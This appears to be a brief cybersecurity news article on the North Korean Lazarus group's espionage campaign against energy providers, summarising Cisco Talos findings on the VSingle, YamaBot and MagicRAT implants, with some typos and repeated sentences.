North Korean Lazarus hackers target energy providers across the world. Their targets include power providers from countries such as Canada, Japan and the United States.
Cisco Talos explained the hacker used the campaign for long-term access into an organization. Lazarus hackers will then try to get valuable data and send it to the nation of the attacker.
A prior report from Symantec and AhnLab states that some elements of the espionage attacks have already entered the public domain.
Some elements of the espionage attacks have already entered public domain, courtesy of prior reports from Broadcom-ownedDF and AhnLab earlier this April and May.
Symantec, according to their report, attributes the operation to Andariel/Lazarus subgroup Stonefly. It is also known by the names such as Andariel, Guardian of Peace, OperationTroy, and Silent Chollima.
Last month a new type of attack used two new types of malware to hide behind VSingle, an HTTP bot and YamaBot, a Golang backdoor. The treat actors also used a new remote access trojan called MagicRAT. It has capabilities to detect and launch additional payloads on compromised systems. Researchers Jung Soo An, Asheer Malhotra, and Vitor Ventura said. “Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus.”
The threat actors manage to gain access to the enterprise networks by exploiting vulnerabilities in VMware products such as Log4Shell. Their final goal is to establish persistent access to perform activities in support of North Korean government objectives.
The researchers explain in one attack chain the threat actors used VSingle to carry out a variety of activities such as reconnaissance, exfiltration, and manual backdooring. Leading to offering operators greater inputs on the victim environment.Lazarus Hackers have also developed capabilities to use bespoke malware including credential harvesting via tools like Mimikatz and Procdump, disabling antivirus components, and reconnaissance of the Active Directory services. They are also capable of cleaning their traces after activating the backdoors on the endpoint.
North Korean Hackers Use Windows Update Service to Infect PCs with Malware
Haskers Gang Distributes ZingoStealer Malware to Other Cybercriminals for Free
China-linked APT40 gang targets Australian companies Maintaining Wind Turbine Fleets